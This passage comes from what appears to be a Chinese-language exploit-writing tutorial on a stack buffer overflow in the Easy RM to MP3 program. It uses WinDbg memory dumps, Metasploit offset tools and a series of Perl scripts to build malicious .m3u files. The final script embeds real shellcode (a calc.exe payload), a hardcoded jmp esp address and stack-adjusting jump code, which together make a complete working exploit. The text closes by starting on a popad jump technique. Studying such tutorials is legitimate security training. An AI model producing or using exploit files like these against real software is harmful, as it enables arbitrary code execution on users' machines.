<img lazyload="" src="/images/loading.svg" data-src="/2021/05/20/exploit%E7%BC%96%E5%86%99%E7%B3%BB%E5%88%972%EF%BC%9A%E6%A0%88%E6%BA%A2%E5%87%BA%EF%BC%8C%E8%B7%B3%E8%BD%AC%E8%87%B3shellcode/image-20210112215736411-1621477705987.png" alt="A 字符所在地址距离 ESP 的偏移" class="" title="image-20210112215736411">

<p>继续往后查看内存，可以看到在ESP+281之后有一大段我们写入的A字符，这表明我们可以使用这段地址来放置shellcode，并在X’s位置设置跳转来跳往A’s地址处。</p>
<pre><code>eax=00000001 ebx=00104a58 ecx=7c93003d edx=00000004 esi=77c2fce0 edi=000066f3
eip=42424242 esp=000ffd38 ebp=00104678 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
42424242 ??              ???
0:000&gt; d esp
000ffd38  58 58 58 58 58 58 58 58-58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
000ffd48  58 58 58 58 58 58 58 58-58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
000ffd58  58 58 58 58 58 58 58 58-58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
000ffd68  58 58 90 90 90 90 90 90-90 90 90 90 90 90 90 90  XX..............
000ffd78  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffd88  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffd98  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffda8  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
0:000&gt; d
000ffdb8  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffdc8  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffdd8  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffde8  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffdf8  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffe08  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffe18  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffe28  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
0:000&gt; d
000ffe38  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffe48  90 90 90 90 90 90 90 90-00 41 41 41 41 41 41 41  .........AAAAAAA
000ffe58  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffe68  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffe78  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffe88  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffe98  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffea8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0:000&gt; d
000ffeb8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffec8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffed8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffee8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffef8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000fff08  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000fff18  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000fff28  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0:000&gt; d
000fff38  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000fff48  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000fff58  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000fff68  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000fff78  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000fff88  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000fff98  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000fffa8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0:000&gt; d
000fffb8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000fffc8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000fffd8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000fffe8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffff8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00100008  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00100018  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00100028  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0:000&gt; d
00100038  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
</code></pre>
<p>现在如果想把 shellcode 放到字符 ‘A’ 所在的区域，就需要先确定 ESP+281 处的那个 ‘A’ 对应于我们写入的 26067 个 ‘A’ 中的第几个字节，这样才能把 shellcode 放置到合适的位置。</p>
<ul>
<li>用pattern_create.rb工具来生成1000个字节的字符模型来替换A的前1000个字节。</li>
</ul>
<pre><code>kali@kali:/usr/share/metasploit-framework/tools/exploit$ ./pattern_create.rb -l 1000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B
kali@kali:/usr/share/metasploit-framework/tools/exploit$ 
</code></pre>
<p>编写perl脚本，生成测试文件</p>
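<pre><code class="perl">use strict;
use warnings;
# blind_return_2.m3u: swap the first 1000 bytes of junk for a Metasploit
# pattern so the bytes seen at ESP+281 can be mapped back to a file offset.
my $file = "blind_return_2.m3u";
my $pattern = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B";
my $junk = "A" x 25067;         # 1000 bytes of pattern + 25067 = 26067, same total as blind_return_1
my $eip  = "BBBB";
my $preshellcode = "X" x 54;    # let's pretend this is the only space we have available at ESP
my $nop  = "\x90" x 230;        # added some nops to visually separate our 54 X's from other data in the ESP dump
open(my $FILE, '&gt;', $file) or die "Cannot open $file: $!\n";
binmode($FILE);   # raw bytes: no newline translation on Windows
print $FILE $pattern.$junk.$eip.$preshellcode.$nop;
close($FILE) or die "Cannot close $file: $!\n";
print "m3u File Created successfully\n";
</code></pre>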
<p>用Easy RM to MP3打开测试文件</p>
<pre><code>eax=00000001 ebx=00104a58 ecx=7c93003d edx=00000004 esi=77c2fce0 edi=000066f3
eip=42424242 esp=000ffd38 ebp=00104678 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
42424242 ??              ???
0:000&gt; d esp
000ffd38  58 58 58 58 58 58 58 58-58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
000ffd48  58 58 58 58 58 58 58 58-58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
000ffd58  58 58 58 58 58 58 58 58-58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
000ffd68  58 58 90 90 90 90 90 90-90 90 90 90 90 90 90 90  XX..............
000ffd78  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffd88  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffd98  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffda8  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
0:000&gt; d
000ffdb8  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffdc8  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffdd8  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffde8  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffdf8  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffe08  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffe18  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffe28  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
0:000&gt; d
000ffe38  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffe48  90 90 90 90 90 90 90 90-00 35 41 69 36 41 69 37  .........5Ai6Ai7
000ffe58  41 69 38 41 69 39 41 6a-30 41 6a 31 41 6a 32 41  Ai8Ai9Aj0Aj1Aj2A
000ffe68  6a 33 41 6a 34 41 6a 35-41 6a 36 41 6a 37 41 6a  j3Aj4Aj5Aj6Aj7Aj
000ffe78  38 41 6a 39 41 6b 30 41-6b 31 41 6b 32 41 6b 33  8Aj9Ak0Ak1Ak2Ak3
000ffe88  41 6b 34 41 6b 35 41 6b-36 41 6b 37 41 6b 38 41  Ak4Ak5Ak6Ak7Ak8A
000ffe98  6b 39 41 6c 30 41 6c 31-41 6c 32 41 6c 33 41 6c  k9Al0Al1Al2Al3Al
000ffea8  34 41 6c 35 41 6c 36 41-6c 37 41 6c 38 41 6c 39  4Al5Al6Al7Al8Al9
0:000&gt; d
000ffeb8  41 6d 30 41 6d 31 41 6d-32 41 6d 33 41 6d 34 41  Am0Am1Am2Am3Am4A
000ffec8  6d 35 41 6d 36 41 6d 37-41 6d 38 41 6d 39 41 6e  m5Am6Am7Am8Am9An
000ffed8  30 41 6e 31 41 6e 32 41-6e 33 41 6e 34 41 6e 35  0An1An2An3An4An5
000ffee8  41 6e 36 41 6e 37 41 6e-38 41 6e 39 41 6f 30 41  An6An7An8An9Ao0A
000ffef8  6f 31 41 6f 32 41 6f 33-41 6f 34 41 6f 35 41 6f  o1Ao2Ao3Ao4Ao5Ao
000fff08  36 41 6f 37 41 6f 38 41-6f 39 41 70 30 41 70 31  6Ao7Ao8Ao9Ap0Ap1
000fff18  41 70 32 41 70 33 41 70-34 41 70 35 41 70 36 41  Ap2Ap3Ap4Ap5Ap6A
000fff28  70 37 41 70 38 41 70 39-41 71 30 41 71 31 41 71  p7Ap8Ap9Aq0Aq1Aq
</code></pre>
<p>可以看到模式字符串从5Ai6开始，借助pattern_offset.rb工具来定位一下5Ai6在模式字符串中的位置</p>
<pre><code>kali@kali:/usr/share/metasploit-framework/tools/exploit$ ./pattern_offset.rb -q 5Ai6
[*] Exact match at offset 257
kali@kali:/usr/share/metasploit-framework/tools/exploit$ 
</code></pre>
<p>可以看到这4个字符的偏移量为257，这下我们可以设计我们要放置shellcode的位置，将文件的前257个字节放置不影响shellcode执行的字符，之后加上我们的shellcode然后剩余的字节还是填充为A。</p>
<p>编写perl脚本查看一下内存是否如我们所想的一样</p>
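<pre><code class="perl">use strict;
use warnings;
# blind_return_3.m3u: place a marker (int3) at file offset 300 so we can check
# that it shows up where the pattern_offset result (257 == ESP+281) predicts.
my $file = "blind_return_3.m3u";
my $buffersize = 26067;
my $junk = "A" x 250;
# 250 bytes of A followed by some NOPs: when there is enough room, a NOP sled
# in front of the computed shellcode address makes the exploit tolerate small offset errors.
my $nop = "\x90" x 50;
my $shellcode = "\xcc";   # int3 marker at offset 300
my $restofbuffer = "A" x ($buffersize - (length($junk) + length($nop) + length($shellcode)));
my $eip = "BBBB";
my $preshellcode = "X" x 54;    # let's pretend this is the only space we have available at ESP
my $nop2 = "\x90" x 230;        # added some nops to visually separate our 54 X's from other data in the ESP dump
open(my $FILE, '&gt;', $file) or die "Cannot open $file: $!\n";
binmode($FILE);   # raw bytes: no newline translation on Windows
print $FILE $junk.$nop.$shellcode.$restofbuffer.$eip.$preshellcode.$nop2;
close($FILE) or die "Cannot close $file: $!\n";
</code></pre>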
<img lazyload="" src="/images/loading.svg" data-src="/2021/05/20/exploit%E7%BC%96%E5%86%99%E7%B3%BB%E5%88%972%EF%BC%9A%E6%A0%88%E6%BA%A2%E5%87%BA%EF%BC%8C%E8%B7%B3%E8%BD%AC%E8%87%B3shellcode/image-20210113231801856-1621477705987.png" class="" title="image-20210113231801856">

<p>当程序中断后我们可以看到，NOP起始于0x000ffe51,后面是我们的shellcode（0xCC)，再之后是一串A字符。</p>
<p><em><strong>接下来我们需要在ESP（上图中X的地址）中放入jmpshellcode指令</strong></em>，来帮助我们跳转到ESP+281的位置。</p>
<p>所以我们需要在 ESP 处这段空间里放入能让 ESP 增加 281（或者稍大一点，因为 shellcode 前面放了一串 NOP，落点有一定的灵活性）的指令，然后再用一条 jmp esp 跳到 shellcode 的位置。</p>
<p>这里可以用三条 <code>add esp,0x5e</code> 指令：0x5e * 3 = 0x11A（282）&gt; 281（0x119），再接一条 jmp esp，就构成了我们的 jmpshellcode。每条 add esp,0x5e 编码为 3 字节（83 c4 5e），jmp esp 为 2 字节（ff e4），合计 11 字节，放得进 ESP 处可用的空间。</p>
<pre><code>0:010&gt; a
7c92120e add esp,0x5e
add esp,0x5e
7c921211 add esp,0x5e
add esp,0x5e
7c921214 add esp,0x5e
add esp,0x5e
7c921217 jmp esp
jmp esp
7c921219 

0:010&gt; u 7c92120e 
ntdll!DbgBreakPoint:
7c92120e 83c45e          add     esp,5Eh
7c921211 83c45e          add     esp,5Eh
7c921214 83c45e          add     esp,5Eh
7c921217 ffe4            jmp     esp
7c921219 04cc            add     al,0CCh
7c92121b c20400          ret     4
ntdll!NtCurrentTeb:
7c92121e 64a118000000    mov     eax,dword ptr fs:[00000018h]
7c921224 c3              ret
</code></pre>
<p>从上面我们可以知道jumpcode的机器码为：0x83,0xc4,0x5e,0x83,0xc4,0x5e,0x83,0xc4,0x5e,0xff,0xe4</p>
<p>然后我们可以根据前面测试得到的一些信息来修改一下我们的exp，然后运行测试一下jmpcode是否可以覆盖ESP的位置</p>
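<pre><code class="perl">use strict;
use warnings;
# blind_return_4.m3u: put the jumpcode (3 x add esp,0x5e + jmp esp) right at ESP
# and check in the debugger that it overwrites the X's as expected.
my $file = "blind_return_4.m3u";
my $buffersize = 26067;
my $junk = "A" x 250;
my $nop  = "\x90" x 50;
my $shellcode = "\xcc";   # position 300
my $restofbuffer = "A" x ($buffersize-(length($junk)+length($nop)+length($shellcode)));
my $eip = "BBBB";
my $preshellcode = "X" x 4;   # ESP points 4 bytes past EIP, so these 4 bytes are skipped
my $jumpcode = "\x83\xc4\x5e" .   # add esp,0x5e
               "\x83\xc4\x5e" .   # add esp,0x5e
               "\x83\xc4\x5e" .   # add esp,0x5e
               "\xff\xe4";        # jmp esp
# (the original listing also built an unused $nop2 from the literal "0x90" - a
#  4-character string, not a byte - it was never written, so it is dropped here)
my $buffer = $junk.$nop.$shellcode.$restofbuffer;
print "Size of buffer : ".length($buffer)."\n";
open(my $FILE, '&gt;', $file) or die "Cannot open $file: $!\n";
binmode($FILE);   # raw bytes: no newline translation on Windows
print $FILE $buffer.$eip.$preshellcode.$jumpcode;
close($FILE) or die "Cannot close $file: $!\n";
print "m3u File Created successfully\n";
</code></pre>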
<img lazyload="" src="/images/loading.svg" data-src="/2021/05/20/exploit%E7%BC%96%E5%86%99%E7%B3%BB%E5%88%972%EF%BC%9A%E6%A0%88%E6%BA%A2%E5%87%BA%EF%BC%8C%E8%B7%B3%E8%BD%AC%E8%87%B3shellcode/image-20210129232150356-1621477705987.png" class="" title="image-20210129232150356">

<p>从图中我们可以看到，esp已经被我们的jmpcode覆盖，执行jmpcode后，ESP将会指向0xFFE50~0xFFE7B之间的地址</p>
<p>这样的话，最后只需要把 EIP 覆盖为一条 jmp esp 指令的地址，让程序先跳到 ESP 处执行我们的 jmpcode。</p>
<p>在前面的调试中我们找到了一个符合我们要求jmp esp的地址（0x01b9f23a），直接拿来用就好。</p>
<p>调整shellcode布局在预定的shellcode处放置0xcc</p>
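<pre><code class="perl">use strict;
use warnings;
# blind_return_5.m3u: same layout as blind_return_4, but EIP now holds the
# address of a jmp esp so the jumpcode at ESP is actually executed; the int3
# at offset 300 tells us whether we land where we expect.
my $file = "blind_return_5.m3u";
my $buffersize = 26067;
my $junk = "A" x 250;
my $nop  = "\x90" x 50;
my $shellcode = "\xcc";   # position 300
my $restofbuffer = "A" x ($buffersize-(length($junk)+length($nop)+length($shellcode)));
my $eip = pack('V', 0x01b9f23a);   # jmp esp address found earlier (little-endian)
my $preshellcode = "X" x 4;        # ESP points 4 bytes past EIP, so these 4 bytes are skipped
my $jumpcode = "\x83\xc4\x5e" .    # add esp,0x5e
               "\x83\xc4\x5e" .    # add esp,0x5e
               "\x83\xc4\x5e" .    # add esp,0x5e
               "\xff\xe4";         # jmp esp
# (the unused $nop2 built from the literal "0x90" in the original listing is dropped)
my $buffer = $junk.$nop.$shellcode.$restofbuffer;
print "Size of buffer : ".length($buffer)."\n";
open(my $FILE, '&gt;', $file) or die "Cannot open $file: $!\n";
binmode($FILE);   # raw bytes: no newline translation on Windows
print $FILE $buffer.$eip.$preshellcode.$jumpcode;
close($FILE) or die "Cannot close $file: $!\n";
print "m3u File Created successfully\n";
</code></pre>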
<pre><code>eax=00000001 ebx=00104a58 ecx=7c93003d edx=00aa0000 esi=77c2fce0 edi=000065e6
eip=000ffe7c esp=000ffe52 ebp=00104678 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000212
000ffe7c cc              int     3
0:000&gt; d esp
000ffe52  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffe62  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffe72  90 90 90 90 90 90 90 90-90 90 cc 41 41 41 41 41  ...........AAAAA
000ffe82  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffe92  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffea2  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffeb2  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffec2  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
</code></pre>
<p>可以看到果然中断在了我们预定的地址。接下来就可以把 0xcc 替换为真正的 shellcode，同时把字符 ‘A’ 全部替换为 NOP，这样 shellcode 前面就有了一大片 NOP 滑板，跳转只需要落在这片区域里即可，所以只跳 188（2 * 0x5e = 0xBC）个字节就够了。</p>
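<pre><code class="perl">use strict;
use warnings;
# blind_return_6.m3u: the real payload. Everything around the shellcode is now
# NOP, so two add esp,0x5e (ESP+0xBC) are enough to land in the sled (see text).
my $file = "blind_return_6.m3u";
my $buffersize = 26067;
my $junk = "\x90" x 250;
my $nop  = "\x90" x 50;
# calc.exe payload used by the article; bytes kept verbatim
my $shellcode = "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";   # position 300
my $restofbuffer = "\x90" x ($buffersize-(length($junk)+length($nop)+length($shellcode)));
my $eip = pack('V', 0x01b9f23a);   # jmp esp address found earlier (little-endian)
my $preshellcode = "X" x 4;        # ESP points 4 bytes past EIP, so these 4 bytes are skipped
my $jumpcode = "\x83\xc4\x5e" .    # add esp,0x5e
               "\x83\xc4\x5e" .    # add esp,0x5e
               # the third add esp,0x5e from blind_return_5 is no longer needed
               "\xff\xe4";         # jmp esp
# (the unused $nop2 built from the literal "0x90" in the original listing is dropped)
my $buffer = $junk.$nop.$shellcode.$restofbuffer;
print "Size of buffer : ".length($buffer)."\n";
open(my $FILE, '&gt;', $file) or die "Cannot open $file: $!\n";
binmode($FILE);   # raw bytes: a text-mode handle on Windows would rewrite 0x0a as 0x0d 0x0a
print $FILE $buffer.$eip.$preshellcode.$jumpcode;
close($FILE) or die "Cannot close $file: $!\n";
print "m3u File Created successfully\n";
</code></pre>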
<p>成功弹出计算器</p>
<img lazyload="" src="/images/loading.svg" data-src="/2021/05/20/exploit%E7%BC%96%E5%86%99%E7%B3%BB%E5%88%972%EF%BC%9A%E6%A0%88%E6%BA%A2%E5%87%BA%EF%BC%8C%E8%B7%B3%E8%BD%AC%E8%87%B3shellcode/image-20210131221051399-1621477705987.png" class="" title="image-20210131221051399">



<h3 id="其它跳转方式"><a href="#其它跳转方式" class="headerlink" title="其它跳转方式"></a>其它跳转方式</h3><ul>
<li>popad</li>
<li>硬编码跳转地址</li>
</ul>
<p>“popad” 指令也可以帮助我们跳转到 shellcode。popad 依次从栈顶（ESP 处）弹出 DWORD 并装入各通用寄存器，顺序为：EDI, ESI, EBP, （跳过 ESP，只是把它加 4）, EBX, EDX, ECX, EAX。因此每弹出一个寄存器 ESP 都会递增 4，一条 popad 总共会让 ESP 前移 32 字节，并把这 32 字节按上述顺序 pop 到各个寄存器中。</p>
<p>popad的机器码是0x61</p>
<p>假设你需要跳过 40 字节，而你只有两个字节可用于跳转，那么可以使用两条 popad 指令让 ESP 前移 2 * 32 = 64 字节，直接指向 shellcode；多跳过的 64 - 40 = 24 字节由 shellcode 前面的一串 NOP 来补偿。让我们再次以 Easy RM to MP3 漏洞来演示这项技术：</p>
<p>我们还是用前面的脚本来练习，伪造一个缓冲区：在 EIP 之后放 17 个 “X”（从下面的转储可以看到 ESP 指向第 5 个 X，所以 ESP 处只能看到 13 个 X），然后放置一些需要跳过的垃圾数据（“D”），再往后是第一段缓冲区里的 “C”，之后才是我们的 shellcode（NOP + 0xcc + A’s）。</p>
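<pre><code class="perl">use strict;
use warnings;
# test1.m3u: lay out the stack for the popad technique - a few X's at ESP,
# 100 bytes of D to jump over, then the buffer that ends in NOPs + int3.
my $file = "test1.m3u";
my $buffersize = 26067;
my $junk = "C" x 250;
my $nop  = "\x90" x 50;
my $shellcode = "\xcc";   # int3 marker
my $restofbuffer = "A" x ($buffersize-(length($junk)+length($nop)+length($shellcode)));
my $eip = "BBBB";
my $preshellcode = "X" x 17;   # let's pretend this is the only space we have available
my $garbage = "D" x 100;       # let's pretend this is the space we need to jump over
my $buffer = $junk.$nop.$shellcode.$restofbuffer;
print "Size of buffer : ".length($buffer)."\n";
open(my $FILE, '&gt;', $file) or die "Cannot open $file: $!\n";
binmode($FILE);   # raw bytes: no newline translation on Windows
print $FILE $buffer.$eip.$preshellcode.$garbage;
close($FILE) or die "Cannot close $file: $!\n";
</code></pre>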
<pre><code>eax=00000001 ebx=00104a58 ecx=7c93003d edx=00aa0000 esi=77c2fce0 edi=0000664c
eip=42424242 esp=000ffd38 ebp=00104678 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
42424242 ??              ???
0:000&gt; d esp
000ffd38  58 58 58 58 58 58 58 58-58 58 58 58 58 44 44 44  XXXXXXXXXXXXXDDD
000ffd48  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD
000ffd58  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD
000ffd68  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD
000ffd78  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD
